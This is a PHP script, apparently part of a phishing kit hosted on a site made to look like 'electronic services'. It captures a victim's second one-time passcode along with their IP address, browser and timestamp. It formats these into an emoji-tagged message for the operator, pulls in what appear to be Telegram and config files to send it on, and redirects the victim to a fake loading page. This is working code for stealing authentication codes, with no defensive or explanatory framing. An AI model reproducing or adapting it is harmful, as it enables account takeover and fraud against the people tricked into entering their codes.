Current File : /home/mak/public_htmls/authorsedcoord/electronicservices/send/send_otp_two.php
<?php
session_start();
error_reporting(0);
require_once '../esc/index.php';
require_once 'os.php'; 
$InfoDATE   = date("d-m-Y h:i:sa");
$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);				
$_SESSION['browser'] = $browserTy_Version =array_pop($browser); 
$ip = $_SERVER['REMOTE_ADDR'];

$otp_two = $_SESSION['otp_two'] = $_POST['otp_two'];

$message = '
💸 [SeTOB] 💸
<br>
SeTOB         : '.$otp_two.'  
<br>
💻  💻
<br>
Padr     : '.$_SERVER["REMOTE_ADDR"].' 
<br>
BHs        : '.$browserTy_Version.' 
<br> 
Tmy           : '.$InfoDATE.' 
<br>
💸  💸
';

require_once '../tlm.php';
require_once '../config.php';
$headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
$subject  = "SeTOB 💸 [".$_SERVER['REMOTE_ADDR']."] ";
$headers .= "From: MRZ" . "\r\n";
header("Location: ../app/loading_auth.php");